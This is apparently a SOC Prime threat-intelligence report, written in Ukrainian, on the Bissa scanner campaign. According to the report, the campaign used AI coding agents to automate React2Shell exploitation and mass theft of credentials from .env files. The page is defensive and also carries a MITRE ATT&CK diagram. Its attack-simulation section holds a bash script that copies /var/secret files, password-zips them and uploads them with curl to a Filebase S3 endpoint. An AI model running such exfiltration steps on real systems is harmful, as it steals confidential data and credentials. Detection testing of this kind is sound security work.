SOC Prime Bias: Критичний

24 Apr 2026 15:19 UTC
newspaper icon Звіт DFIR

Bissa Scanner: Викрито: Масове використання зловживань та збір облікових записів за допомогою AI

Author Photo
SOC Prime Team linkedin icon Стежити
Bissa Scanner: Викрито: Масове використання зловживань та збір облікових записів за допомогою AI
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Резюме

Виявлений сервер розкрив масштабну операцію, що використовувала платформу сканера Bissa, Claude Code та OpenClaw для автоматизації експлуатації вразливостей цілеспрямованих об’єктів через уразливість React2Shell (CVE-2025-55182). Кампанія здобула мільйони .env файлів, які містять цінні облікові дані від служб AI, хмарних, платіжних та месенджерів. Зібрані дані були завантажені у публічний S3-бакет на Filebase для подальшого використання. Операція була спрямована на організації у фінансовому, криптовалютному та роздрібному секторах.

Розслідування

Аналітики відновили понад 13 000 файлів, що показують робочий процес для сканування, експлуатації, перевірки та пріоритизації середовищ жертв. Журнали підтвердили понад 900 успішних компрометацій за допомогою експлоту React2Shell. Telegram-боти використовувалися для реального часу сповіщення, зв’язуючи кожен удар з інформацією про жертву. Сканер також містив модуль для вразливості WordPress W3 Total Cache (CVE-2025-9501), хоча не було зафіксовано жодних успішних експлуатацій.

Захист

Вчасно виправляйте вразливі програми та фреймворки, особливо компоненти React2Shell та WordPress W3 Total Cache. Переміщуйте секрети з .env файлів у спеціальні менеджери секретів і регулярно змінюйте облікові дані. Зміцнюйте доступ до метаданих у хмарі та застосовуйте модель найменшого привілею RBAC. Моніторте вихідний трафік для виявлення несанкціонованих завантажень до зовнішніх сервісів зберігання.

Відповідь

Реалізуйте правила виявлення для експлуатації CVE-2025-55182 та несанкціонованих завантажень в S3. Заблокуйте відомі зловмисні домени та комунікації Telegram-ботів. Проведіть форензійний аналіз скомпрометованих хостів для знаходження та видалення залишкових корисних навантажень. Негайно повідомте постраждалих користувачів та змініть будь-які витеклі облікові дані.

"графік TB %% Визначення класів classDef техніка fill:#ffcc99 classDef інструмент fill:#cccccc classDef дія fill:#99ccff classDef оператор fill:#ff9900 %% Вузли інструмент_бісса_сканер["<b>Інструмент</b> – <b>Назва</b>: Bissa сканер<br/><b>Призначення</b>: Виконувати масове активне сканування, використовуючи цільові ділянки"] class інструмент_бісса_сканер інструмент тех_T1595_002["<b>Техніка</b> – <b>T1595.002 Активне Сканування: Сканування Вразливостей</b><br/><b>Опис</b>: Сканує хости з доступом до Інтернету, щоб знайти вразливі служби"] class тех_T1595_002 техніка тех_T1190["<b>Техніка</b> – <b>T1190 Експлуатація Публічно-Звернених Додатків</b><br/><b>Опис</b>: Впроваджує уразливі веб-додатки для отримання початкового доступу"] class тех_T1190 техніка інструмент_react2shell["<b>Інструмент</b> – <b>Назва</b>: React2Shell (CVEu20112025u201155182)<br/><b>Функція</b>: Надає віддалене виконання коду через сконструйоване React навантаження"] class інструмент_react2shell інструмент тех_T1210["<b>Техніка</b> – <b>T1210 Експлуатація Віддалених Послуг</b><br/><b>Опис</b>: Виконує навантаження на віддалених службах для отримання виконання коду"] class тех_T1210 техніка тех_T1211["<b>Техніка</b> – <b>T1211 Експлуатація для Уникнення Захисту</b><br/><b>Опис</b>: Використовує вразливості для обходу захисних механізмів та залишитися непоміченим"] class тех_T1211 техніка тех_T1552_001["<b>Техніка</b> – <b>T1552.001 Незахищені Облікові Дані: Облікові Дані у Файлах</b><br/><b>Опис</b>: Збирає облікові дані, які зберігаються у файлах конфігурації, таких як .env"] class тех_T1552_001 техніка тех_T1119["<b>Техніка</b> – <b>T1119 Автоматизований Збір</b><br/><b>Опис</b>: Автоматизує перевірку, пріоритизацію та групування зібраних даних для відчуження"] class тех_T1119 техніка тех_T1102_002["<b>Техніка</b> – <b>T1102.002 Веб-служба: Білятеральна Комунікація</b><br/><b>Опис</b>: Використовує веб-служби (Telegram-боти) для обміну командами та даними"] class тех_T1102_002 техніка інструмент_telegram_bot["<b>Інструмент</b> – <b>Назва</b>: Telegram-боти @bissapwned_bot, @bissa_scan_bot<br/><b>Призначення</b>: Канал командування та управління"] class інструмент_telegram_bot інструмент тех_T1567_002["<b>Техніка</b> – <b>T1567.002 Відчуження Через Веб-службу: Відчуження до Хмарного Сховища</b><br/><b>Опис</b>: Завантажує викрадені архіви до хмарного сховища через веб-службу"] class тех_T1567_002 техніка інструмент_filebase_bucket["<b>Інструмент</b> – <b>Назва</b>: Filebase S3-сумісний бакет (bissapromax)<br/><b>Призначення</b>: Зберігає відчужені архіви облікових даних"] class інструмент_filebase_bucket інструмент тех_T1537["<b>Техніка</b> – <b>T1537 Переміщення Даних до Хмарного Рахунку</b><br/><b>Опис</b>: Переміщує дані до хмарного рахунку, контрольованого зловмисником, для подальшого отримання"] class тех_T1537 техніка тех_T1068["<b>Техніка</b> – <b>T1068 Експлуатація для Підвищення Привілеїв</b><br/><b>Опис</b>: Використовує зібрані облікові дані для отримання вищих привілеїв та бічного переміщення"] class тех_T1068 техніка %% З’єднання tool_bissa_scanner –>|виконує| тех_T1595_002 tech_T1595_002 –>|виявляє уразливі служби| тех_T1190 tech_T1190 –>|використовує| інструмент_react2shell інструмент_react2shell –>|доставляє навантаження до| тех_T1210 tech_T1210 –>|активує| тех_T1211 tech_T1211 –>|дозволяє| тех_T1552_001 tech_T1552_001 –>|постачає до| тех_T1119 tech_T1119 –>|відправляє дані через| тех_T1102_002 tech_T1102_002 –>|реалізовані| інструмент_telegram_bot tech_T1102_002 –>|виводить до| тех_T1567_002 tech_T1567_002 –>|зберігає в| інструмент_filebase_bucket інструмент_filebase_bucket –>|активує| тех_T1537 tech_T1537 –>|підтримує| тех_T1068 "

Хід атаки

Виконання симуляції

Необхідна умова: Телеметрія та перевірка базових настанов повинні пройти.

  • Сценарій атаки та команди:
    Супротивник отримав набір конфіденційних документів з /var/secret/. Щоб уникнути виявлення, вони спочатку архівують дані у ZIP-файл, захищений паролем, а потім використовують curl щоб завантажити архів безпосередньо на кінцеву точку S3 Filebase через корпоративний форвард-проксі. Проксі логує повну URL-адресу запиту, що відповідає правилу виявлення.

  • Сценарій регресійного тестування:

    #!/usr/bin/env bash
set -euo pipefail

# 1️⃣ Підготовка даних (T1074)
STAGE_DIR="/tmp/staged_data"
mkdir -p "$STAGE_DIR"
cp -r /var/secret/* "$STAGE_DIR/"

# 2️⃣ Архівування даних (T1560.001) – ZIP, захищений паролем
ARCHIVE="/tmp/exfil_archive.zip"
ZIP_PASSWORD="P@ssw0rd!"
zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null

# 3️⃣ Відчуження через кінцеву точку Filebase S3 (T1020)
# Передбачається, що проксі доступний за адресою http://proxy.company.local:3128
FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip"
curl -x http://proxy.company.local:3128 
     -T "$ARCHIVE" 
     -H "Host: s3.filebase.com" 
     -H "User-Agent: Mozilla/5.0" 
     "$FILEBASE_URL" 
     --silent --output /dev/null

echo "Спроба відчуження завершена."

  • Команди очистки:

    # Видалити підготовлені файли та архів
rm -rf /tmp/staged_data /tmp/exfil_archive.zip

# (Додатково) Очистити з'єднання проксі за необхідності
# Для Squid: squid -k rotate
echo "Очистка завершена."

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно